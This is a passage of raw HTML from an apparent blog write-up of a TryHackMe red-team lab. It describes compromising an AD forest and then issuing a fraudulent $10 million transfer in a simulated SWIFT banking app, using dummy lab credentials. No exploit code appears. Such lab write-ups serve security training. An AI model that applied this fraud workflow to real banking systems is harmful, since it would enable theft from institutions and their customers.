https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210201339.png?w=1256&amp;ssl=1 1256w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>At this point, we have compromised all three domains. We have the highest privileges in the domain and we own all the Domain Controllers, users, and computers for the entire AD Forest. This is a huge achievement for a Red Teamer.<\/p>\n\n\n\n<p>The goal of this challenge is to show the impact of the compromise. Our final goal is to make a fraudulent transaction and compromise the SWIFT banking system.<\/p>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"34-compromising-swift-banking-system-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Compromising SWIFT Banking System<\/mark><\/h2>\n\n\n\n<p>Accessing the application from the <strong>JMP <\/strong>machine shows us the following web page.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911e9d8&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911e9d8\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"648\" data-attachment-id=\"528\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210193256\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210193256.png?fit=1221%2C773&amp;ssl=1\" data-orig-size=\"1221,773\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210193256\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210193256.png?fit=1024%2C648&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210193256.png?resize=1024%2C648&#038;ssl=1\" alt=\"\" class=\"wp-image-528\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210193256.png?resize=1024%2C648&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210193256.png?resize=300%2C190&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210193256.png?resize=768%2C486&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210193256.png?w=1221&amp;ssl=1 1221w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>To get instructions on how to proceed, we can go to the e-citizen platform and select option 17 as supposed to we are submitting the proof of compromise. We get the below instructions.<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#282A36\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"In order to proof that you have access to the SWIFT system, dummy accounts have been created for you and you will have to perform the following steps to prove access.\n===============================================\nAccount Details:\nSource Email:\t\tishsome36@source.loc\nSource Password:\tT9nscPQYAnD-Jw\nSource AccountID:\t65c82460599a22214d185b31\nSource Funds:\t\t$ 10 000 000\n\nDestination Email:\tishsome36@destination.loc\nDestination Password:\tpKLuBT5vhbh7-w\nDestination AccountID:\t65c82463599a22214d185b32\nDestination Funds:\t$ 10\n===============================================\n\nUsing these details, perform the following steps:\n1. Go to the SWIFT web application\n2. Navigate to the Make a Transaction page\n3. Issue a transfer using the Source account as Sender and the Destination account as Receiver. You will have to use the corresponding account IDs.\n4. Issue the transfer for the full 10 million dollars\n5. Once completed, request verification of your transaction here (No need to check your email once the transfer has been created).\" style=\"color:#F8F8F2;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki dracula\" style=\"background-color: #282A36\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #50FA7B\">In<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">order<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">to<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">proof<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">that<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">you<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">have<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">access<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">to<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">the<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">SWIFT<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">system,<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">dummy<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">accounts<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">have<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">been<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">created<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">for<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">you<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">and<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">you<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">will<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">have<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">to<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">perform<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">the<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">following<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">steps<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">to<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">prove<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">access.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">===============================================<\/span><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">Account<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Details:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">Source<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Email:<\/span><span style=\"color: #F8F8F2\">\t\t<\/span><span style=\"color: #F1FA8C\">ishsome36@source.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">Source<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Password:<\/span><span style=\"color: #F8F8F2\">\t<\/span><span style=\"color: #F1FA8C\">T9nscPQYAnD-Jw<\/span><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">Source<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">AccountID:<\/span><span style=\"color: #F8F8F2\">\t<\/span><span style=\"color: #BD93F9\">65<\/span><span style=\"color: #F1FA8C\">c82460599a22214d185b31<\/span><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">Source<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Funds:<\/span><span style=\"color: #F8F8F2\">\t\t$ <\/span><span style=\"color: #BD93F9\">10<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #BD93F9\">000<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #BD93F9\">000<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">Destination<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Email:<\/span><span style=\"color: #F8F8F2\">\t<\/span><span style=\"color: #F1FA8C\">ishsome36@destination.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">Destination<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Password:<\/span><span style=\"color: #F8F8F2\">\t<\/span><span style=\"color: #F1FA8C\">pKLuBT5vhbh7-w<\/span><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">Destination<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">AccountID:<\/span><span style=\"color: #F8F8F2\">\t<\/span><span style=\"color: #BD93F9\">65<\/span><span style=\"color: #F1FA8C\">c82463599a22214d185b32<\/span><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">Destination<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Funds:<\/span><span style=\"color: #F8F8F2\">\t$ <\/span><span style=\"color: #BD93F9\">10<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">===============================================<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">Using<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">these<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">details,<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">perform<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">the<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">following<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">steps:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">1.<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Go<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">to<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">the<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">SWIFT<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">web<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">application<\/span><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">2.<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Navigate<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">to<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">the<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Make<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">a<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Transaction<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">page<\/span><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">3.<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Issue<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">a<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">transfer<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">using<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">the<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Source<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">account<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">as<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Sender<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">and<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">the<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Destination<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">account<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">as<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Receiver.<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">You<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">will<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">have<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">to<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">use<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">the<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">corresponding<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">account<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">IDs.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">4.<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Issue<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">the<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">transfer<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">for<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">the<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">full<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #BD93F9\">10<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">million<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">dollars<\/span><\/span>\n<span class=\"line\"><span style=\"color: #50FA7B\">5.<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">Once<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">completed,<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">request<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">verification<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">of<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">your<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">transaction<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">here<\/span><span style=\"color: #F8F8F2\"> (No <\/span><span style=\"color: #F1FA8C\">need<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">to<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">check<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">your<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">email<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">once<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">the<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">transfer<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">has<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">been<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F1FA8C\">created<\/span><span style=\"color: #F8F8F2\">).<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can log in with the credentials provided to us and make the transaction.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911efc0&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911efc0\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"547\" data-attachment-id=\"529\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210194126\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210194126.png?fit=1202%2C642&amp;ssl=1\" data-orig-size=\"1202,642\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210194126\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210194126.png?fit=1024%2C547&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210194126.png?resize=1024%2C547&#038;ssl=1\" alt=\"\" class=\"wp-image-529\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210194126.png?resize=1024%2C547&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210194126.png?resize=300%2C160&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210194126.png?resize=768%2C410&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210194126.png?w=1202&amp;ssl=1 1202w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We received a PIN in our email and using it we can confirm that our transaction was initiated.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911f608&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911f608\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"371\" data-attachment-id=\"530\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210212157\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210212157.png?fit=1080%2C391&amp;ssl=1\" data-orig-size=\"1080,391\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210212157\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210212157.png?fit=1024%2C371&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210212157.png?resize=1024%2C371&#038;ssl=1\" alt=\"\" class=\"wp-image-530\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210212157.png?resize=1024%2C371&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210212157.png?resize=300%2C109&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210212157.png?resize=768%2C278&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210212157.png?w=1080&amp;ssl=1 1080w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 